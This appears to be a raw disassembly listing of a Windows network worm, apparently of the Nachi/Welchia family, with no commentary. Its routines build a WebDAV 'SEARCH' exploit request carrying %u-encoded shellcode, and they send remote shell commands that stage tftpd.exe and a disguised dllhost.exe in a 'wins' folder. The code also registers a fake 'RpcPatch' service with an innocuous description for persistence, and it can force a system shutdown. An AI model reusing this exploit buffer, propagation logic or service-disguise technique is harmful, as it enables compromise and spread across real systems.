loc_401C44: ; DATA XREF: seg002:0040AE45�o
push 1FFh
push edi
push ecx
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
sub eax, [esp+14h+arg_4]
add ebp, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401C0C
loc_401C64: ; CODE XREF: sub_401B90+26�j
; sub_401B90+7A�j ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401C6C: ; CODE XREF: sub_401B90+93�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
pop ecx
retn
sub_401B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C80 proc near ; DATA XREF: sub_401990+116�o
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FF = byte ptr -3FFh
arg_0 = dword ptr 4
sub esp, 404h
mov eax, [esp+404h+arg_0]
push ebp
push esi
push edi
mov esi, [eax]
mov ecx, 0FFh
xor eax, eax
lea edi, [esp+410h+var_3FF]
mov [esp+410h+var_400], 0
push 4
rep stosd
lea ecx, [esp+414h+var_404]
mov [esp+414h+var_404], 1388h
stosw
push ecx
push 1006h
push 0FFFFh
push esi
stosb
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
test eax, eax
jz loc_401E54
mov ebp, dword_404100
lea eax, [esp+410h+var_400]
push offset aMicrosoftWindo ; "Microsoft Windows"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz loc_401E54
lea ecx, [esp+410h+var_400]
push offset dword_4061BC
push ecx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401D4D
loc_401D1D: ; CODE XREF: sub_401C80+CB�j
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
mov [esp+eax+410h+var_400], 0
lea eax, [esp+410h+var_400]
push offset dword_4061BC
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz short loc_401D1D
loc_401D4D: ; CODE XREF: sub_401C80+9B�j
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirWinsDllhost ; "dir wins\\dllhost.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aDllhost_exe ; "DLLHOST.EXE"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea eax, [esp+410h+var_400]
push offset aDllhost_exe_0 ; "dllhost.exe"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirDllcacheTft ; "dir dllcache\\tftpd.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aTftpd_exe_0 ; "tftpd.exe"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea eax, [esp+410h+var_400]
push offset aTftpd_exe ; "TFTPD.EXE"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea ecx, [esp+410h+var_400]
push ecx
push offset dword_407628
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
jmp short loc_401E07
; ---------------------------------------------------------------------------
loc_401DF0: ; CODE XREF: sub_401C80+142�j
; sub_401C80+155�j
lea edx, [esp+410h+var_400]
push edx
push offset aCopyDllcacheTf ; "copy dllcache\\tftpd.exe wins\\svchost.ex"...
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz short loc_401E54
loc_401E07: ; CODE XREF: sub_401C80+16E�j
lea eax, [esp+410h+var_400]
push eax
push offset dword_4075A8
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
mov ebp, dword_4040C8
push 1F4h
call ebp ; dword_4040C8
mov edi, offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
or ecx, 0FFFFFFFFh
xor eax, eax
push 0
repne scasb
not ecx
dec ecx
push ecx
push offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
push esi
call dword_404168 ; send
test eax, eax
jz short loc_401E54
push 3E8h
call ebp ; dword_4040C8
loc_401E54: ; CODE XREF: sub_401C80+5F�j
; sub_401C80+67�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop esi
mov eax, [esp+408h+arg_0]
pop ebp
test eax, eax
jz short loc_401E72
push eax
call sub_402FC6
add esp, 4
loc_401E72: ; CODE XREF: sub_401C80+1E7�j
mov eax, 1
add esp, 404h
retn 4
sub_401C80 endp
; =============== S U B R O U T I N E =======================================
sub_401E80 proc near ; CODE XREF: sub_401210:loc_401217�p
; sub_401210+17�p
push offset aMicrosoft_com ; "microsoft.com"
call dword_404160 ; gethostbyname
neg eax
sbb eax, eax
neg eax
retn
sub_401E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EA0 proc near ; CODE XREF: sub_401210:loc_401230�p
var_70 = dword ptr -70h
var_64 = byte ptr -64h
sub esp, 74h
lea eax, [esp+74h+var_64]
push esi
push 64h
push eax
call dword_404158 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_401F1D
lea ecx, [esp+78h+var_64]
push ecx
call dword_404160 ; gethostbyname
test eax, eax
jz short loc_401F1D
mov edx, [eax+0Ch]
mov esi, [edx]
test esi, esi
jz short loc_401F1D
movsx ecx, word ptr [eax+0Ah]
mov eax, ecx
push edi
lea edi, [esp+7Ch+var_70]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+7Ch+var_70]
push ecx
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, 1
mov edx, ecx
mov esi, edi
mov edi, offset dword_407478
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401F1D: ; CODE XREF: sub_401EA0+14�j
; sub_401EA0+23�j ...
xor eax, eax
pop esi
add esp, 74h
retn
sub_401EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F30 proc near ; CODE XREF: sub_401280+A5�p
var_50 = byte ptr -50h
sub esp, 50h
or ecx, 0FFFFFFFFh
xor eax, eax
push esi
push edi
mov edi, offset aSearch ; "SEARCH /"
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ds:dword_4075A0
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, 41414141h
and ecx, 3
rep movsb
mov edx, ds:dword_4075A0
mov ecx, 41h
mov dword_406424, 8
mov esi, offset aU5951U6858U759 ; "%u5951%u6858%u759f%u0018%u5951%u6858%u7"...
lea edi, [edx+8]
rep stosd
stosb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 105h
mov ecx, 41414141h
mov dword_406424, eax
add eax, edx
mov [eax], ecx
mov [eax+4], ecx
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 8
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 30h
rep movsd
movsb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 0C0h
mov ecx, 31h
mov esi, offset aU5390U665eU66a ; "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"...
mov dword_406424, eax
lea edi, [eax+edx]
rep movsd
movsw
movsb
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 0C6h
mov esi, offset aFfilomidomfafd ; "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"...
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 55h
rep movsd
movsb
mov edx, dword_406424
mov esi, ds:dword_4075A0
add edx, 154h
mov ecx, 3F52h
mov eax, 4E4E4E4Eh
mov dword_406424, edx
lea edi, [edx+esi]
mov esi, offset aHttp1_1Host127 ; " HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"...
rep stosd
stosw
mov eax, dword_406424
mov edx, ds:dword_4075A0
mov ecx, 14h
lea edi, [esp+58h+var_50]
add eax, 0FD4Ah
rep movsd
lea edi, [eax+edx]
mov ecx, 14h
lea esi, [esp+58h+var_50]
mov dword_406424, eax
rep movsd
mov eax, dword_406424
mov esi, offset loc_40597E
add eax, 4Fh
mov dword_406424, eax
lea ecx, [eax+0E7h]
lea edx, [eax+0ECh]
mov dword_40642C, ecx
mov ecx, ds:dword_4075A0
mov ds:dword_407470, edx
lea edi, [eax+ecx]
mov ecx, 5Dh
rep movsd
movsw
mov eax, dword_406424
mov esi, ds:dword_4075A0
mov cx, word_406238
mov dl, byte_40623A
add eax, 175h
pop edi
mov dword_406424, eax
add eax, esi
pop esi
mov [eax], cx
mov [eax+2], dl
mov eax, dword_406424
add eax, 2
mov dword_406424, eax
add esp, 50h
retn
sub_401F30 endp
; =============== S U B R O U T I N E =======================================
sub_4020E0 proc near ; CODE XREF: sub_401210+57�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, ds:dword_4075A0
mov edx, dword_40642C
xor eax, 9999h
push offset dword_407478
mov [edx+ecx], ax
call dword_404194 ; inet_addr
mov ecx, ds:dword_4075A0
mov edx, ds:dword_407470
xor eax, 99999999h
mov [edx+ecx], eax
retn
sub_4020E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402130 proc near ; CODE XREF: sub_401210+5C�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, dword_406428
xor eax, 9999h
push offset dword_407478
mov word ptr dword_406470[ecx], ax
call dword_404194 ; inet_addr
mov edx, ds:dword_407474
xor eax, 99999999h
mov dword_406470[edx], eax
retn
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402170 proc near ; CODE XREF: sub_401280+AA�p
push esi
mov eax, dword_4057DC
push edi
mov ecx, 0D8h
mov esi, offset dword_40547C
mov edi, offset dword_406470
rep movsd
mov ecx, dword_4057E4
add eax, 166h
add ecx, 166h
mov dword_4057DC, eax
mov dword_4057E4, ecx
mov dword_4067D8, ecx
mov ecx, dword_4057E8
mov dword_4067D0, eax
mov eax, dword_4057E0
mov dword_4067DC, ecx
mov ecx, 0B3h
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov edi, offset dword_4067E0
mov edx, dword_405484
mov dword_40584C, 100139Dh
mov dword_4067D4, eax
rep movsd
mov ecx, 0Fh
mov esi, offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
mov edi, offset dword_406AAC
add edx, 2C0h
rep movsd
mov ecx, 0Ch
mov esi, offset dword_405AF4
mov edi, offset dword_406AE8
mov eax, 2C0h
rep movsd
mov esi, dword_406480
mov ecx, dword_4064F4
mov edi, dword_406524
mov dword_406478, edx
mov edx, dword_4064F0
add esi, eax
add edx, eax
add ecx, eax
mov dword_406480, esi
mov esi, dword_406528
mov dword_4064F0, edx
mov edx, dword_406540
mov dword_4064F4, ecx
mov ecx, dword_4065FC
add edi, eax
add esi, eax
mov dword_406524, edi
add edx, eax
add ecx, eax
mov dword_406528, esi
pop edi
mov dword_406428, 5ADh
mov ds:dword_407474, 5B2h
mov dword_406420, 6A8h
mov dword_406540, edx
mov dword_4065FC, ecx
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401780+1E8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 14h
lea eax, [esp+14h+var_14]
push eax
push 28h
call dword_40409C ; GetCurrentProcess
push eax
call dword_404044 ; OpenProcessToken
lea ecx, [esp+14h+var_C]
push ecx
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
push 0
call dword_404048 ; LookupPrivilegeValueA
mov eax, [esp+14h+var_14]
push 0
push 0
lea edx, [esp+1Ch+var_10]
push 0
push edx
push 0
push eax
mov [esp+2Ch+var_10], 1
mov [esp+2Ch+var_4], 2
call dword_404028 ; AdjustTokenPrivileges
mov ecx, [esp+14h+arg_0]
push 0
or ecx, 4
push ecx
call dword_404148 ; ExitWindowsEx
add esp, 14h
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: sub_401780:loc_401788�p
var_9C = dword ptr -9Ch
var_94 = dword ptr -94h
sub esp, 9Ch
call dword_404094 ; GetVersion
and eax, 0FFh
lea ecx, [esp+9Ch+var_9C]
cmp eax, 5
push ecx
sbb eax, eax
and al, 0F8h
add eax, 9Ch
mov [esp+0A0h+var_9C], eax
call dword_404098 ; GetVersionExA
mov eax, [esp+9Ch+var_94]
add esp, 9Ch
retn
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402390+D�p
; sub_402390+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
lea eax, [esp+arg_0]
push eax
push 1
push 0
push ecx
push 80000002h
call dword_40403C ; RegOpenKeyExA
test eax, eax
jnz short loc_40237E
mov edx, [esp+arg_0]
push edx
call dword_404040 ; RegCloseKey
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40237E: ; CODE XREF: sub_402350+1B�j
xor eax, eax
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402390 proc near ; CODE XREF: sub_401780+1D�p
; sub_401780+1DA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_4023AC
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Updates\\Windows 2000"...
call sub_402350
add esp, 4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4023AC: ; CODE XREF: sub_402390+6�j
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
loc_4023C7: ; DATA XREF: sub_40A2D7+1F3�w
add esp, 4
test eax, eax
jnz short loc_4023CF
retn
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_402390+2B�j
; sub_402390+3C�j
mov eax, 1
locret_4023D4: ; DATA XREF: sub_40A2D7+204�w
retn
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; CODE XREF: sub_4015E0+61�p
; sub_401660+5C�p
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 110h
push ebx
push ebp
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
jnz short loc_40240A
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40240A: ; CODE XREF: sub_4023E0+1D�j
mov ecx, 41h
loc_40240F: ; DATA XREF: sub_40A2D7+3�w
; sub_40A2D7+13�r ...
xor eax, eax
lea edi, [esp+120h+var_107]
mov [esp+120h+var_108], 0
rep stosd
mov edi, [esp+120h+arg_8]
loc_402423: ; DATA XREF: sub_40A2D7+A9�r
lea eax, [esp+120h+var_108]
loc_402427: ; DATA XREF: seg002:0040ABF3�r
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsS ; "%s\\wins\\%s"
push eax
call dword_40411C ; sprintf
push offset aSvchost_exe ; "svchost.exe"
push edi
mov esi, 2
call dword_404140 ; _stricmp
add esp, 18h
test eax, eax
jnz short loc_402456
mov esi, 3
loc_402456: ; CODE XREF: sub_4023E0+6F�j
push 0
mov edx, [esp+124h+arg_4]
push 0
mov eax, [esp+128h+arg_0]
push 0
push 0
lea ecx, [esp+130h+var_108]
push 0
push ecx
push 0
push esi
push 110h
push 0F01FFh
push edx
push eax
push ebp
loc_402483: ; DATA XREF: sub_40A461+7�r
; seg002:0040AD51�r
call dword_404030 ; CreateServiceA
mov ebx, eax
loc_40248B: ; DATA XREF: sub_40A2D7+DF�r
test ebx, ebx
jnz short loc_4024A3
loc_40248F: ; DATA XREF: seg002:0040AC23�r
push ebp
call dword_404034 ; CloseServiceHandle
pop edi
loc_402497: ; DATA XREF: sub_40A2D7+1DB�r
; seg002:loc_40AA67�r
pop esi
pop ebp
xor eax, eax
loc_40249B: ; DATA XREF: sub_40A2D7+1EA�r
; seg002:0040AA78�r
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_4023E0+AD�j
; DATA XREF: sub_40A2D7+24A�r ...
mov ecx, [esp+120h+arg_C]
push 0F01FFh
loc_4024AF: ; DATA XREF: sub_40A9D0+2D�r
push ecx
push ebp
mov [esp+12Ch+var_110], offset aManagesNetwork ; "Manages network configuration by updati"...
xor esi, esi
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jz short loc_402507
push 400h
push 40h
mov [esp+128h+var_10C], esi
call dword_40408C ; LocalAlloc
mov esi, eax
loc_4024DA: ; DATA XREF: seg002:0040AD6D�o
test esi, esi
jz short loc_4024FC
lea edx, [esp+120h+var_10C]
push edx
loc_4024E3: ; DATA XREF: seg002:0040AC0D�r
push 400h
push esi
push 1
push edi
call dword_404004 ; QueryServiceConfig2A
test eax, eax
jz short loc_4024FC
mov eax, [esi]
mov [esp+120h+var_110], eax
loc_4024FC: ; CODE XREF: sub_4023E0+FC�j
; sub_4023E0+114�j
push edi
mov edi, dword_404034
call edi ; dword_404034
loc_402505: ; DATA XREF: seg002:0040AB9F�r
; seg002:0040AD77�w
jmp short loc_40250D
; ---------------------------------------------------------------------------
loc_402507: ; CODE XREF: sub_4023E0+E5�j
mov edi, dword_404034
loc_40250D: ; CODE XREF: sub_4023E0:loc_402505�j
lea ecx, [esp+120h+var_110]
push ecx
push 1
push ebx
call dword_404000 ; ChangeServiceConfig2A
test esi, esi
jz short loc_402526
push esi
call dword_404090 ; LocalFree
loc_402526: ; CODE XREF: sub_4023E0+13D�j
push ebx
call edi ; dword_404034
push ebp
call edi ; dword_404034
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 110h
retn
sub_4023E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402540 proc near ; CODE XREF: sub_401280+EC�p
; sub_401280+110�p
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
sub esp, 134h
push ebp
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
mov [esp+13Ch+var_134], ebp
jnz short loc_40256A
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_40256A: ; CODE XREF: sub_402540+1F�j
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+140h+var_104]
push offset aDSWins ; "-d%s\\wins"
push eax
mov [esp+148h+var_130], 0
call dword_40411C ; sprintf
mov edx, [esp+148h+arg_0]
add esp, 0Ch
lea ecx, [esp+13Ch+var_104]
push 0F01FFh
push edx
push ebp
mov [esp+148h+var_128], ecx
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jnz short loc_4025B5
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_402540+6A�j
push ebx
push esi
push 400h
push 40h
call dword_40408C ; LocalAlloc
mov esi, dword_40401C
mov ebx, eax
lea eax, [esp+13Ch+var_118]
mov [esp+13Ch+var_124], ebx
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_4025E3
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_4025E3: ; CODE XREF: sub_402540+9A�j
mov eax, [esp+13Ch+var_114]
cmp eax, 4
jz loc_402709
cmp eax, 2
jz loc_402709
lea ecx, [esp+13Ch+var_11C]
push ecx
push 400h
push ebx
push edi
call dword_404020 ; QueryServiceConfigA
test eax, eax
jnz short loc_402616
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402616: ; CODE XREF: sub_402540+CD�j
cmp dword ptr [ebx+4], 4
jnz short loc_402642
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 3
push 0FFFFFFFFh
push edi
call dword_404024 ; ChangeServiceConfigA
test eax, eax
jnz short loc_402642
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402642: ; CODE XREF: sub_402540+DA�j
; sub_402540+F9�j
lea edx, [esp+13Ch+var_120]
push edx
push 1
push edi
call dword_404008 ; StartServiceA
test eax, eax
jnz short loc_40265B
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40265B: ; CODE XREF: sub_402540+112�j
lea eax, [esp+13Ch+var_118]
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_40266E
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40266E: ; CODE XREF: sub_402540+125�j
cmp [esp+13Ch+var_114], 2
jnz loc_4026F9
mov ebp, dword_4040C8
mov ebx, dword_4040C0
mov esi, [esp+13Ch+var_11C]
loc_402689: ; CODE XREF: sub_402540+1AF�j
mov eax, 0CCCCCCCDh
mul [esp+13Ch+var_100]
shr edx, 3
cmp edx, 3E8h
jnb short loc_4026A4
mov edx, 3E8h
jmp short loc_4026B1
; ---------------------------------------------------------------------------
loc_4026A4: ; CODE XREF: sub_402540+15B�j
cmp edx, 2710h
jbe short loc_4026B1
mov edx, 2710h
loc_4026B1: ; CODE XREF: sub_402540+162�j
; sub_402540+16A�j
push edx
call ebp ; dword_4040C8
lea ecx, [esp+13Ch+var_118]
push ecx
push edi
call dword_40401C ; QueryServiceStatus
test eax, eax
jz short loc_4026F1
mov edx, [esp+13Ch+var_128]
mov eax, [esp+13Ch+var_104]
cmp eax, edx
jbe short loc_4026DE
call ebx ; dword_4040C0
mov esi, eax
mov eax, [esp+13Ch+var_104]
mov [esp+13Ch+var_128], eax
jmp short loc_4026EA
; ---------------------------------------------------------------------------
loc_4026DE: ; CODE XREF: sub_402540+18E�j
call ebx ; dword_4040C0
mov ecx, [esp+13Ch+var_100]
sub eax, esi
cmp eax, ecx
ja short loc_4026F1
loc_4026EA: ; CODE XREF: sub_402540+19C�j
cmp [esp+13Ch+var_114], 2
jz short loc_402689
loc_4026F1: ; CODE XREF: sub_402540+182�j
; sub_402540+1A8�j
mov ebp, [esp+13Ch+var_12C]
mov ebx, [esp+13Ch+var_124]
loc_4026F9: ; CODE XREF: sub_402540+133�j
mov eax, [esp+13Ch+var_114]
xor ecx, ecx
cmp eax, 4
setz cl
mov esi, ecx
jmp short loc_40270E
; ---------------------------------------------------------------------------
loc_402709: ; CODE XREF: sub_402540+AA�j
; sub_402540+B3�j
mov esi, 1
loc_40270E: ; CODE XREF: sub_402540+9E�j
; sub_402540+D1�j ...
push ebx
call dword_404090 ; LocalFree
push edi
mov edi, dword_404034
call edi ; dword_404034
push ebp
call edi ; dword_404034
mov eax, esi
pop esi
pop ebx
pop edi
pop ebp
add esp, 134h
retn
sub_402540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_4011C0+1F�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
sub esp, 1Ch
push esi
push edi
push 80000000h
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jnz short loc_402755
pop edi
mov eax, 11111111h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402755: ; CODE XREF: sub_402730+18�j
push 0F01FFh
push offset aRpcpatch ; "RpcPatch"
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402777
pop edi
mov eax, 22222222h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402777: ; CODE XREF: sub_402730+3A�j
lea eax, [esp+24h+var_1C]
push eax
push esi
call dword_40401C ; QueryServiceStatus
test eax, eax
push esi
mov esi, dword_404034
jnz short loc_40279E
call esi ; dword_404034
push edi
call esi ; dword_404034
pop edi
mov eax, 33333333h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_40279E: ; CODE XREF: sub_402730+5C�j
call esi ; dword_404034
push edi
call esi ; dword_404034
mov eax, [esp+24h+var_18]
pop edi
pop esi
add esp, 1Ch
retn
sub_402730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_4011C0+6�p
push offset aRpcpatch_mutex ; "RpcPatch_Mutex"
push 0
push 0
call dword_404084 ; CreateMutexA
test eax, eax
jz short loc_4027D3
call dword_404060 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_4027D3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4027D3: ; CODE XREF: sub_4027B0+11�j
; sub_4027B0+1E�j
mov eax, 1
retn
sub_4027B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027E0 proc near ; CODE XREF: sub_4011C0:loc_4011FC�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
xor eax, eax
mov [esp+10h+var_10], offset aRpcpatch ; "RpcPatch"
mov [esp+10h+var_8], eax
mov [esp+10h+var_4], eax
lea eax, [esp+10h+var_10]
mov [esp+10h+var_C], offset loc_402920
push eax
call dword_404018 ; StartServiceCtrlDispatcherA
neg eax
sbb eax, eax
neg eax
dec eax
add esp, 10h
retn
sub_4027E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_402880+1A�p
; sub_402880+33�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 1Ch
mov eax, [esp+1Ch+arg_0]
mov ecx, [esp+1Ch+arg_8]
mov dword_405BA0, eax
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+arg_4]
lea edx, [esp+1Ch+var_1C]
mov [esp+1Ch+var_10], eax
mov eax, ds:dword_4076A8
push edx
push eax
mov [esp+24h+var_1C], 10h
mov [esp+24h+var_14], 5
mov [esp+24h+var_C], 0
mov [esp+24h+var_8], ecx
mov [esp+24h+var_4], 0BB8h
call dword_404014 ; SetServiceStatus
add esp, 1Ch
retn
sub_402820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402880 proc near ; DATA XREF: seg000:loc_402920�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
cmp eax, 3 ; switch 4 cases
ja short locret_402909 ; default
jmp off_40290C[eax*4] ; switch jump
loc_402891: ; DATA XREF: seg000:off_40290C�o
push 1388h ; jumptable 0040288A case 0
push 0
push 3
call sub_402820
add esp, 0Ch
push 3E8h
call dword_4040C8 ; Sleep
push 0
push 0
push 1
call sub_402820
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_4028BE: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 1
push 0
push 6
call sub_402820
push 0
push 0
push 7
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 2
push 0
push 5
call sub_402820
push 0
push 0
push 4
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028F6: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
mov ecx, dword_405BA0 ; jumptable 0040288A case 3
push 0
push 0
push ecx
call sub_402820
add esp, 0Ch
locret_402909: ; CODE XREF: sub_402880+8�j
retn 4 ; default
sub_402880 endp
; ---------------------------------------------------------------------------
off_40290C dd offset loc_402891 ; DATA XREF: sub_402880+A�r
dd offset loc_4028BE ; jump table for switch statement
dd offset loc_4028DA
dd offset loc_4028F6
align 10h
loc_402920: ; DATA XREF: sub_4027E0+19�o
push offset sub_402880
push offset aRpcpatch ; "RpcPatch"
call dword_404010 ; RegisterServiceCtrlHandlerA
test eax, eax
mov ds:dword_4076A8, eax
jz short locret_40296D
push 1
push 0
push 2
call sub_402820
push 0
push 0
push 4
call sub_402820
call sub_401280
push 0
push 0
push 3
call sub_402820
push 0
push 0
push 1
call sub_402820
add esp, 30h
locret_40296D: ; CODE XREF: seg000:00402937�j
retn 8
